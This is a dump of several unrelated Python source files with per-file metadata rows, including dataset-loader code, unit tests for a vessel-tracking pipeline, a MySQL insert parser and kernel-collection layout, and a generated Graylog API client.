det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # 长
else:
det_sequences_visual_all[j, 0] = pooled_feat
# 后面这串是verb_idx
if loc_2_verb[j] != []:
if self.gt_verb is False:
verb_list[j, :] = self.flickr_verb_idx[loc_2_verb[j][0].split('_')[0]] + 1
else:
for v_lem, verb_og in vlem_2_verb:
if v_lem == loc_2_verb[j][0].split('_')[0]:
if verb_og in self.vocab_2_idx:
verb_list[j, :] = self.vocab_2_idx[verb_og]
break
for k, sr in enumerate(loc_2_sr[j]):
if k >= 8:
continue
det_sequences_sr[j, k] = sr # 0代表pad
det_sequences_verb[j, k] = self.flickr_verb_idx[loc_2_verb[j][k].split('_')[0]] + 1 # 0代表pad
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
verb_list
| 47.273381
| 148
| 0.574433
| 9,063
| 65,710
| 3.875648
| 0.036191
| 0.080285
| 0.043559
| 0.027502
| 0.917637
| 0.910918
| 0.891388
| 0.88168
| 0.872342
| 0.865082
| 0
| 0.037445
| 0.297291
| 65,710
| 1,389
| 149
| 47.307415
| 0.723249
| 0.032689
| 0
| 0.837084
| 0
| 0
| 0.026473
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023402
| false
| 0
| 0.010801
| 0
| 0.063906
| 0.0009
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22e491ae56f387d29d5930346fe5fefe51615eab
| 4,736
|
py
|
Python
|
tests/test_segment_identity_daily.py
|
GlobalFishingWatch/pipe-segment
|
4992719d9244901baed7c5db88f434cb87ebb179
|
[
"Apache-2.0"
] | null | null | null |
tests/test_segment_identity_daily.py
|
GlobalFishingWatch/pipe-segment
|
4992719d9244901baed7c5db88f434cb87ebb179
|
[
"Apache-2.0"
] | 65
|
2017-09-26T23:59:14.000Z
|
2022-02-14T12:48:25.000Z
|
tests/test_segment_identity_daily.py
|
GlobalFishingWatch/pipe-segment
|
4992719d9244901baed7c5db88f434cb87ebb179
|
[
"Apache-2.0"
] | 2
|
2019-04-18T20:37:10.000Z
|
2022-03-15T15:28:36.000Z
|
import pytest
import unittest
from pipe_tools.utils.timestamp import as_timestamp
from pipe_segment.segment_identity.transforms import summarize_identifiers
class TestSegmentIdentityDaily():
def test_summarize_identifiers_no_empties(self):
segment = {
"seg_id": u'338013000-2017-07-20T05:59:35.000000Z',
"ssvid": u'338013000',
"timestamp": as_timestamp('2018-01-01T00:00:00.000000Z'),
"first_msg_of_day_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_msg_of_day_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"message_count": 100,
"transponders": [
{ "value": u"338013000", "count": 90 },
{ "value": u"338013001", "count": 20 }
],
"shipnames": [
{ "value": u"", "count": 90 },
{ "value": u"f/v boaty Mc Boatface", "count": 30 }
],
"callsigns": [
{ "value": u"", "count": 90 },
{ "value": u"@@123", "count": 40 }
],
"imos": [
{ "value": u"0", "count": 90 },
{ "value": u"8875956", "count": 50 }
]
}
result = summarize_identifiers(segment)
assert result == {
"seg_id": u'338013000-2017-07-20T05:59:35.000000Z',
"ssvid": u'338013000',
"timestamp": as_timestamp('2018-01-01T00:00:00.000000Z'),
"first_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"first_pos_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_pos_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"msg_count": 100,
"pos_count": 110,
"ident_count": 120,
"shipname": [
{ "value": u"", "count": 90 },
{ "value": u"f/v boaty Mc Boatface", "count": 30 }
],
"callsign": [
{ "value": u"", "count": 90 },
{ "value": u"@@123", "count": 40 }
],
"imo": [
{ "value": u"0", "count": 90 },
{ "value": u"8875956", "count": 50 }
],
"n_shipname": [
{ "value": u"BOATYMCBOATFACE", "count": 30 }
],
"n_callsign": [
{ "value": u"123", "count": 40 }
],
"n_imo": [
{ "value": u"8875956", "count": 50 }
],
"shiptype": None,
"length": None,
"width": None,
"noise": False
}
def test_summarize_identifiers_empty_identifiers(self):
segment = {
"seg_id": u'338013000-2017-07-20T05:59:35.000000Z',
"ssvid": u'338013000',
"timestamp": as_timestamp('2018-01-01T00:00:00.000000Z'),
"first_msg_of_day_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_msg_of_day_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"message_count": 100,
"transponders": [
{ "value": u"338013000", "count": 90 },
{ "value": u"338013001", "count": 20 }
],
"shipnames": [
{ "value": u"", "count": 90 },
],
"callsigns": [
{ "value": u"", "count": 90 },
],
"imos": [
{ "value": u"0", "count": 90 },
]
}
result = summarize_identifiers(segment)
assert result == {
"seg_id": u'338013000-2017-07-20T05:59:35.000000Z',
"ssvid": u'338013000',
"timestamp": as_timestamp('2018-01-01T00:00:00.000000Z'),
"first_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"first_pos_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_pos_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"msg_count": 100,
"pos_count": 110,
"ident_count": 90,
"shipname": [
{ "value": u"", "count": 90 },
],
"callsign": [
{ "value": u"", "count": 90 },
],
"imo": [
{ "value": u"0", "count": 90 },
],
"n_shipname": None,
"n_callsign": None,
"n_imo": None,
"shiptype": None,
"length": None,
"width": None,
"noise": False
}
| 36.713178
| 86
| 0.464105
| 469
| 4,736
| 4.522388
| 0.176972
| 0.070721
| 0.150872
| 0.181047
| 0.842999
| 0.784064
| 0.764262
| 0.764262
| 0.725601
| 0.698256
| 0
| 0.206376
| 0.370777
| 4,736
| 128
| 87
| 37
| 0.505369
| 0
| 0
| 0.806723
| 0
| 0
| 0.337698
| 0.144034
| 0
| 0
| 0
| 0
| 0.016807
| 1
| 0.016807
| false
| 0
| 0.033613
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
22fd1309505c4735956fb977e9b5751a4292d7ab
| 46
|
py
|
Python
|
native/libcst/tests/fixtures/indents_but_no_eol_before_eof.py
|
jschavesr/LibCST
|
e5ab7b90b4c9cd1f46e5b875ad317411abf48298
|
[
"Apache-2.0"
] | 880
|
2019-08-07T21:21:11.000Z
|
2022-03-29T06:25:34.000Z
|
native/libcst/tests/fixtures/indents_but_no_eol_before_eof.py
|
jschavesr/LibCST
|
e5ab7b90b4c9cd1f46e5b875ad317411abf48298
|
[
"Apache-2.0"
] | 537
|
2019-08-08T18:34:30.000Z
|
2022-03-30T16:46:14.000Z
|
native/libcst/tests/fixtures/indents_but_no_eol_before_eof.py
|
jschavesr/LibCST
|
e5ab7b90b4c9cd1f46e5b875ad317411abf48298
|
[
"Apache-2.0"
] | 108
|
2019-08-08T00:17:21.000Z
|
2022-03-24T20:53:31.000Z
|
if 1:
if 2:
if 3:
pass
| 11.5
| 16
| 0.282609
| 7
| 46
| 1.857143
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1875
| 0.652174
| 46
| 4
| 16
| 11.5
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a3aefcd9bba065c2a8d8ad476237b25d221c1da6
| 1,644
|
py
|
Python
|
tests/formats/mysql/file_reader/parsers/test_insert_values.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 10
|
2018-04-09T08:39:42.000Z
|
2022-03-14T15:36:05.000Z
|
tests/formats/mysql/file_reader/parsers/test_insert_values.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 14
|
2018-05-02T11:14:08.000Z
|
2022-01-15T18:48:54.000Z
|
tests/formats/mysql/file_reader/parsers/test_insert_values.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 5
|
2018-07-18T02:20:48.000Z
|
2022-02-19T09:32:07.000Z
|
import unittest
from mygrations.formats.mysql.file_reader.parsers.insert_values import insert_values
class test_insert_values(unittest.TestCase):
def test_simple(self):
# parse typical insert values
parser = insert_values()
returned = parser.parse("( 'name', 'bob', 'okay', 1),")
# we should have matched
self.assertTrue(parser.matched)
# and we should have some data now
self.assertEquals('', returned)
# all we really have is the list of values
self.assertEquals(['name', 'bob', 'okay', '1'], parser.values)
self.assertTrue(parser.has_comma)
def test_optional_comma(self):
# parse typical insert values
parser = insert_values()
returned = parser.parse("('name', 'bob', 'okay', 1)")
# we should have matched
self.assertTrue(parser.matched)
# and we should have some data now
self.assertEquals('', returned)
# all we really have is the list of values
self.assertEquals(['name', 'bob', 'okay', '1'], parser.values)
self.assertFalse(parser.has_comma)
def test_return(self):
# parse typical insert values
parser = insert_values()
returned = parser.parse("('name','bob','okay',1), ('name','bob')")
# we should have matched
self.assertTrue(parser.matched)
# and we should have some data now
self.assertEquals("('name','bob')", returned)
# all we really have is the list of values
self.assertEquals(['name', 'bob', 'okay', '1'], parser.values)
self.assertTrue(parser.has_comma)
| 31.615385
| 84
| 0.61983
| 199
| 1,644
| 5.045226
| 0.231156
| 0.10757
| 0.065737
| 0.071713
| 0.819721
| 0.791833
| 0.791833
| 0.791833
| 0.791833
| 0.791833
| 0
| 0.004914
| 0.257299
| 1,644
| 51
| 85
| 32.235294
| 0.817363
| 0.227494
| 0
| 0.541667
| 0
| 0
| 0.117741
| 0.019093
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.125
| false
| 0
| 0.083333
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3c827d058869d5d1d8b1308c77d64c23c43d3e2
| 13,911
|
py
|
Python
|
graylog/apis/clustersystemloggers_api.py
|
yumimobi/graylog.py
|
3118f4a49c91c2cbbd660523b0ab99e56fbfd861
|
[
"Apache-2.0"
] | 10
|
2016-09-27T08:13:22.000Z
|
2018-09-04T13:15:42.000Z
|
graylog/apis/clustersystemloggers_api.py
|
yumimobi/graylog.py
|
3118f4a49c91c2cbbd660523b0ab99e56fbfd861
|
[
"Apache-2.0"
] | 1
|
2019-08-28T16:16:09.000Z
|
2019-08-28T16:16:09.000Z
|
graylog/apis/clustersystemloggers_api.py
|
yumimobi/graylog.py
|
3118f4a49c91c2cbbd660523b0ab99e56fbfd861
|
[
"Apache-2.0"
] | 5
|
2016-11-03T07:45:18.000Z
|
2021-08-19T14:21:49.000Z
|
# coding: utf-8
"""
No descripton provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.1.1+01d50e5
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ClustersystemloggersApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def loggers(self, **kwargs):
"""
List all loggers of all nodes and their current levels
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.loggers(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Map
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.loggers_with_http_info(**kwargs)
else:
(data) = self.loggers_with_http_info(**kwargs)
return data
def loggers_with_http_info(self, **kwargs):
"""
List all loggers of all nodes and their current levels
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.loggers_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Map
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method loggers" % key
)
params[key] = val
del params['kwargs']
resource_path = '/cluster/system/loggers'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Map',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def set_subsystem_logger_level(self, node_id, subsystem, level, **kwargs):
"""
Set the loglevel of a whole subsystem
Provided level is falling back to DEBUG if it does not exist
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_subsystem_logger_level(node_id, subsystem, level, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Object node_id: (required)
:param Object subsystem: (required)
:param Object level: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.set_subsystem_logger_level_with_http_info(node_id, subsystem, level, **kwargs)
else:
(data) = self.set_subsystem_logger_level_with_http_info(node_id, subsystem, level, **kwargs)
return data
def set_subsystem_logger_level_with_http_info(self, node_id, subsystem, level, **kwargs):
"""
Set the loglevel of a whole subsystem
Provided level is falling back to DEBUG if it does not exist
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_subsystem_logger_level_with_http_info(node_id, subsystem, level, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Object node_id: (required)
:param Object subsystem: (required)
:param Object level: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['node_id', 'subsystem', 'level']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_subsystem_logger_level" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'node_id' is set
if ('node_id' not in params) or (params['node_id'] is None):
raise ValueError("Missing the required parameter `node_id` when calling `set_subsystem_logger_level`")
# verify the required parameter 'subsystem' is set
if ('subsystem' not in params) or (params['subsystem'] is None):
raise ValueError("Missing the required parameter `subsystem` when calling `set_subsystem_logger_level`")
# verify the required parameter 'level' is set
if ('level' not in params) or (params['level'] is None):
raise ValueError("Missing the required parameter `level` when calling `set_subsystem_logger_level`")
resource_path = '/cluster/system/loggers/{nodeId}/subsystems/{subsystem}/level/{level}'.replace('{format}', 'json')
path_params = {}
if 'node_id' in params:
path_params['nodeId'] = params['node_id']
if 'subsystem' in params:
path_params['subsystem'] = params['subsystem']
if 'level' in params:
path_params['level'] = params['level']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def subsystems(self, **kwargs):
"""
List all logger subsystems and their current levels
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.subsystems(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Map
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.subsystems_with_http_info(**kwargs)
else:
(data) = self.subsystems_with_http_info(**kwargs)
return data
def subsystems_with_http_info(self, **kwargs):
"""
List all logger subsystems and their current levels
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.subsystems_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Map
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method subsystems" % key
)
params[key] = val
del params['kwargs']
resource_path = '/cluster/system/loggers/subsystems'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Map',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 38.217033
| 123
| 0.569837
| 1,448
| 13,911
| 5.28384
| 0.145028
| 0.062737
| 0.020389
| 0.028232
| 0.827866
| 0.79885
| 0.789962
| 0.747484
| 0.728663
| 0.728663
| 0
| 0.001662
| 0.351089
| 13,911
| 363
| 124
| 38.322314
| 0.845907
| 0.357127
| 0
| 0.680982
| 1
| 0
| 0.14547
| 0.054007
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042945
| false
| 0
| 0.042945
| 0
| 0.147239
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3ede58eb2cb8c078252b9167e16c6a9ada9789d
| 152
|
py
|
Python
|
src/jbhannah/infrastructure/click/__init__.py
|
jbhannah/infrastructure
|
63f473b1d2b76d28bfa76ecf444dc49c3c59df47
|
[
"MIT"
] | null | null | null |
src/jbhannah/infrastructure/click/__init__.py
|
jbhannah/infrastructure
|
63f473b1d2b76d28bfa76ecf444dc49c3c59df47
|
[
"MIT"
] | 4
|
2021-06-24T18:41:56.000Z
|
2021-07-24T18:13:44.000Z
|
src/jbhannah/infrastructure/click/__init__.py
|
jbhannah/infrastructure
|
63f473b1d2b76d28bfa76ecf444dc49c3c59df47
|
[
"MIT"
] | null | null | null |
from .group import command, group, proxy_command
from .verbose import verbose_option
__all__ = ["command", "group", "proxy_command", "verbose_option"]
| 30.4
| 65
| 0.769737
| 19
| 152
| 5.736842
| 0.421053
| 0.220183
| 0.311927
| 0.440367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111842
| 152
| 4
| 66
| 38
| 0.807407
| 0
| 0
| 0
| 0
| 0
| 0.256579
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
430e9ba42fbfc95731396b2c8d7ece71b1216e75
| 6,668
|
py
|
Python
|
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/auxkc-no-split-seg/test.py
|
1079278593/TreasureChest
|
8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8
|
[
"MIT"
] | null | null | null |
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/auxkc-no-split-seg/test.py
|
1079278593/TreasureChest
|
8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8
|
[
"MIT"
] | null | null | null |
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/auxkc-no-split-seg/test.py
|
1079278593/TreasureChest
|
8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python2.7
import os
import KernelCollection
# Verify that we can build an auxKC from third party kext's without split seg
def check(kernel_cache):
# First build a kernel collection
kernel_cache.buildKernelCollection("x86_64", "/auxkc-no-split-seg/main.kc", "/auxkc-no-split-seg/main.kernel", "/auxkc-no-split-seg/extensions", [], [])
kernel_cache.analyze("/auxkc-no-split-seg/main.kc", ["-layout", "-arch", "x86_64"])
assert len(kernel_cache.dictionary()["cache-segments"]) == 6
assert kernel_cache.dictionary()["cache-segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["cache-segments"][0]["vmAddr"] == "0x8000"
assert kernel_cache.dictionary()["cache-segments"][1]["name"] == "__PRELINK_TEXT"
assert kernel_cache.dictionary()["cache-segments"][1]["vmAddr"] == "0xC000"
assert kernel_cache.dictionary()["cache-segments"][2]["name"] == "__TEXT_EXEC"
assert kernel_cache.dictionary()["cache-segments"][2]["vmAddr"] == "0xC000"
assert kernel_cache.dictionary()["cache-segments"][3]["name"] == "__PRELINK_INFO"
assert kernel_cache.dictionary()["cache-segments"][3]["vmAddr"] == "0x10000"
assert kernel_cache.dictionary()["cache-segments"][4]["name"] == "__HIB"
assert kernel_cache.dictionary()["cache-segments"][4]["vmAddr"] == "0x4000"
assert kernel_cache.dictionary()["cache-segments"][5]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["cache-segments"][5]["vmAddr"] == "0x14000"
assert len(kernel_cache.dictionary()["dylibs"]) == 1
# main.kernel
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert len(kernel_cache.dictionary()["dylibs"][0]["segments"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][0]["vmAddr"] == "0xC000"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][1]["name"] == "__HIB"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][1]["vmAddr"] == "0x4000"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][2]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][2]["vmAddr"] == "0x14000"
# Now build an aux cache using the baseline kernel collection
kernel_cache.buildAuxKernelCollection("x86_64", "/auxkc-no-split-seg/aux.kc", "/auxkc-no-split-seg/main.kc", "", "/auxkc-no-split-seg/extensions", ["com.apple.foo", "com.apple.bar"], [])
kernel_cache.analyze("/auxkc-no-split-seg/aux.kc", ["-layout", "-arch", "x86_64"])
assert len(kernel_cache.dictionary()["cache-segments"]) == 8
assert kernel_cache.dictionary()["cache-segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["cache-segments"][0]["vmAddr"] == "0x4000"
assert kernel_cache.dictionary()["cache-segments"][1]["name"] == "__PRELINK_TEXT"
assert kernel_cache.dictionary()["cache-segments"][1]["vmAddr"] == "0x8000"
assert kernel_cache.dictionary()["cache-segments"][2]["name"] == "__PRELINK_INFO"
assert kernel_cache.dictionary()["cache-segments"][2]["vmAddr"] == "0x0"
assert kernel_cache.dictionary()["cache-segments"][3]["name"] == "__REGION0"
assert kernel_cache.dictionary()["cache-segments"][3]["vmAddr"] == "0x8000"
assert kernel_cache.dictionary()["cache-segments"][4]["name"] == "__REGION1"
assert kernel_cache.dictionary()["cache-segments"][4]["vmAddr"] == "0x9000"
assert kernel_cache.dictionary()["cache-segments"][5]["name"] == "__REGION2"
assert kernel_cache.dictionary()["cache-segments"][5]["vmAddr"] == "0xA000"
assert kernel_cache.dictionary()["cache-segments"][6]["name"] == "__REGION3"
assert kernel_cache.dictionary()["cache-segments"][6]["vmAddr"] == "0xB000"
assert kernel_cache.dictionary()["cache-segments"][7]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["cache-segments"][7]["vmAddr"] == "0xC000"
assert len(kernel_cache.dictionary()["dylibs"]) == 2
# bar.kext
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.bar"
assert len(kernel_cache.dictionary()["dylibs"][0]["segments"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][0]["vmAddr"] == "0x8000"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][1]["name"] == "__DATA"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][1]["vmAddr"] == "0x9000"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][2]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][2]["vmAddr"] == "0xC000"
# foo.kext
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.foo"
assert len(kernel_cache.dictionary()["dylibs"][1]["segments"]) == 3
assert kernel_cache.dictionary()["dylibs"][1]["segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][0]["vmAddr"] == "0xA000"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][1]["name"] == "__DATA"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][1]["vmAddr"] == "0xB000"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][2]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][2]["vmAddr"] == "0xC000"
# Check the fixups
kernel_cache.analyze("/auxkc-no-split-seg/aux.kc", ["-fixups", "-arch", "x86_64"])
assert kernel_cache.dictionary()["fixups"] == ""
assert len(kernel_cache.dictionary()["dylibs"]) == 2
# bar.kext
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.bar"
assert len(kernel_cache.dictionary()["dylibs"][0]["fixups"]) == 1
assert kernel_cache.dictionary()["dylibs"][0]["fixups"]["0x5008"] == "kc(3) + 0x9000"
# foo.kext
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.foo"
assert len(kernel_cache.dictionary()["dylibs"][1]["fixups"]) == 1
assert kernel_cache.dictionary()["dylibs"][1]["fixups"]["0x5008"] == "kc(3) + 0xB000"
# [~]> xcrun -sdk macosx.internal cc -arch x86_64 -Wl,-static -mkernel -nostdlib -Wl,-add_split_seg_info -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text -Wl,-e,__start -Wl,-pagezero_size,0x0 -Wl,-pie main.c -o main.kernel -Wl,-install_name,/usr/lib/swift/split.seg.v2.hack -Wl,-segprot,__HIB,r-x,r-x -Wl,-image_base,0x8000 -Wl,-segaddr,__HIB,0x4000
# [~]> xcrun -sdk macosx.internal cc -arch x86_64 -Wl,-kext -mkernel -nostdlib foo.c -o extensions/foo.kext/foo
# [~]> xcrun -sdk macosx.internal cc -arch x86_64 -Wl,-kext -mkernel -nostdlib bar.c -o extensions/bar.kext/bar
| 68.040816
| 353
| 0.669016
| 842
| 6,668
| 5.118765
| 0.137767
| 0.178654
| 0.311833
| 0.338283
| 0.824362
| 0.816241
| 0.787239
| 0.721578
| 0.515545
| 0.372854
| 0
| 0.044142
| 0.106479
